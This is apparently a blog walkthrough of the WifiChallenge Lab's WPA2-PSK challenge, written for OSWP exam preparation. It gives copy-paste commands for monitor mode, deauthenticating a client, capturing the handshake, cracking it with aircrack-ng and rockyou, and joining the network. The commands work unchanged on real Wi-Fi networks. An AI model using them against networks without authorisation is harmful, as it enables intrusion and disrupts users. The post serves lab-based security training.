Summary

This blog post is the first article in a series of three that will serve as preparation for Offsec Wireless Professional (OSWP) exam. This first article is a complete walkthrough the WPA2-PSK challenge delivered by WifiChallenge Lab. In parts 2 and 3, I will demonstrate WPA2-MGT and WEP challenge walkthroughs.

Disclaimer

This article is for informational and educational purpose only, and for those who’re willing and curious to know and learn about Security and Penetration Testing. The article does not contain any information or examples from the actual OSWP exam. It does provide a framework that you can use to your advantage. The content may not be used for illegal purposes. If you’re ready to learn something new for the good, then read on.

Why this blog?

There are a number of very good articles on study materials that can be used to pass the OSWP exam. The most notable ones are the OSWP playbook (https://zeyadazima.com/notes/oswplaybook/) and the Github page of “The H4ck3r Dude” (https://github.com/TheH4ck3rDude/OSWP-Exam-Notes).

Based on the two articles mentioned above, I have created an easy walkthrough for going through the WPA2-PSK scenario. This walkthrough contains easy ‘copy pastables’. It is set up in such a way that you only need to change the values ​​of the required variables. This reduces errors and is much more efficient.

We will use the WPA2-PSK challenge from the WifiChallenge Lab (https://lab.wifichallenge.com/).

Lab environment

This POC consists of just 1 machine: an attacker machine (Kali Linux, 192.168.62.187) running the Docker instance of the WifiChallenge Lab version 2.1.

I will not explain how install Docker on Kali Linux. You can use the following installation walkthrough: https://www.geeksforgeeks.org/techtips/how-to-install-docker-in-kali-linux/

Create the WifiChallange Lab Docker environment

1. Open a command terminal and copy and paste the commands below:

cd /opt; 
sudo git clone https://github.com/r4ulcl/WiFiChallengeLab-docker
cd WiFiChallengeLab-docker
docker compose -f docker-compose.yml up

2. Check if all 4 WifiChallenge Lab Docker containers are running

docker container ls

3. Check if Kali contains some new (virtual) Wifi interfaces

iwconfig | grep wlan -A 1

Part 1: Enumerate Wifi networks and select a target WPA2-PSK Access Point (AP) to attack

4. Kill processes that may cause problems with airmon-ng (such as NetworkManager). Copy and paste the command below:

sudo airmon-ng check kill

5. Set interface wlan0 in monitor mode.

sudo airmon-ng start wlan0

6. Check what access points (APs) are active on frequency bands 2,4Ghz and 5Ghz.

sudo airodump-ng  --band abg wlan0mon

Results:

We detected 4 unique potential APs configured as WPA2-PSK (Cipher CCMP). Three of them transmit on channel 6 (see column ‘CH’).

7. Check the APs that are transmitting on channel 6.

channel=6
sudo airodump-ng -c ${channel} wlan0mon

We found two stations associated with AP ‘wifi-mobile’.

Results:

ESSID = wifi-mobile

BSSID = F0:9F:C2:71:22:12

Station 1 = 28:6C:07:6F:F9:43

Station 2 = 28:6C:07:6F:F9:44

Part 2: Capture handshake

In this part, we will try to capture an authentication handshake.

8. Open a new terminal tab. Start monitoring specifically AP ‘wifi-mobile’ and dump the output in a capture file. Use copy and paste to execute the following command(s):

channel=6
dumpfile='/tmp/dump-wpa'
bssid='F0:9F:C2:71:22:12'
client='28:6C:07:6F:F9:43'
essid='wifi-mobile'
sudo rm /tmp/dump-wpa-01*
sudo airodump-ng -c ${channel}  -w ${dumpfile} --output-format pcap,csv --essid ${essid} --bssid ${bssid} wlan0mon

9. Open a second terminal tab. Send a deauthentication frame to client 1. In that case client 1 will try to re-authenticate again during our capture. Use copy and paste to execute the following command(s):

channel=6
dumpfile='/tmp/dump-wpa'
bssid='F0:9F:C2:71:22:12'
client='28:6C:07:6F:F9:43'
essid='wifi-mobile'
sudo aireplay-ng -0 1 -e ${essid} -a ${bssid} -c ${client}  wlan0mon

Next return to terminal 1 and check if a WPA handshake is captured.

10. Press CNTL+C to stop airodump. Stop monitoring on wlan0mon:

sudo airmon-ng stop wlan0mon

Part 3: Crack handshake

We will use hashcat to crack the authentication request that we captured.

11. Check if your dumpfile (including the authentication request) is present.

ls -l /tmp/dump-wpa*

12. Download rockyou.txt. Note: On the OWSP exam, the JohnTheRipper wordlist ‘/usr/share/john/password.lst’ is good enough.

wget https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt -O /tmp/rockyou.txt

13. Use hashcat to crack the WPA2 authentication request. Use copy and paste to execute the following command(s):

wordlist='/tmp/rockyou.txt'
dumpfile='/tmp/dump-wpa'
bssid='F0:9F:C2:71:22:12'
essid='wifi-mobile'
cd /tmp
aircrack-ng -w ${wordlist} -e ${essid} -b ${bssid} ${dumpfile}-01.cap

Result:

We cracked the WPA2 key: ‘starwars1’

Part 4: connect to the target network

In this final section, we will try to connect to the target network and dowload the proof.txt file.

14. Create a network configuration file. Use copy and paste to execute the following command(s) in the command terminal:

wpa_key='starwars1'
bssid='F0:9F:C2:71:22:12'
essid='wifi-mobile'
cat << EOF > /tmp/wpa.conf
  network={
         ssid="${essid}"
         key_mgmt=WPA-PSK
         psk="${wpa_key}"
         priority=100
         bssid=${bssid}
        }
EOF

16. Get a valid ip-address on interface wlan0.

sudo dhclient wlan0 -v

17. Download the proof.txt file. On the OSWP exam, the target ip-address (for every scenario) is always 192.168.1.1. For illustration purposes only, we will try to download the proof.txt file from target 192.168.2.1.

target=192.168.2.1
curl http://${target}/proof.txt

That was it! Good luck with the exam.

References

· https://lab.wifichallenge.com

· https://www.offsec.com/courses/pen-210/

· https://zeyadazima.com/notes/oswplaybook

· https://github.com/TheH4ck3rDude/OSWP-Exam-Notes